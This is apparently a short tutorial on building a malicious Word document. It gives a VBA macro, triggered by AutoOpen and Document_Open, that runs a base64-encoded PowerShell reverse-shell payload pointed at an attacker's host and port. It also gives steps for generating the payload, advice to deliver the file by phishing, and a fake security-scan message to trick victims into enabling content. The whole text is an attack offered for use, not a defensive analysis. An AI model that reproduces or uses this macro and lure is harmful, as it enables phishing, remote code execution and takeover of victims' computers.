Creating-a-Malicious-doc
As we know that how important documents are in a company. We can create a malicious macro using MS Word which leads to create a doc file contain our malicious code, if any user open that doc file the payload triggred and attacker gets a reverse shell. Phishing is the best way to send someone a malicious document.
Exploitation
Generate a powershell base64 encoded payload using newpayloadgeneration.py
python3 newpayloadgeneration.py 192.168.x.x 443
Using payload.py to get Shellcode
copy that payload and paste the code on another payload.py python script, then run payload.py and get shellcode which we gonna copy and use it on MS Word macro.
python3 payload.py
Creating a Macro using MS Word
Now open MS Word goto View –> choose Macro –> open macro –> create a macro, name it MyMacro –> choose option Macros in: Document1(document)
We need macro language to create a malicious macro.
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = Str + "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAt"
Str = Str + "AE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAF"
.
.
.
CreateObject("Wscript.Shell").Run Str
End Sub
Copy and paste that encoded shellcode as shown.
NOTE: I’ll give my doc name project.doc and remember to choose save type as Word 97-2003 Document.
For this to work user must click on Enable Content, in real world usually saying something along the lines of “Security product XYZ has scanned the content and deemed it to be safe.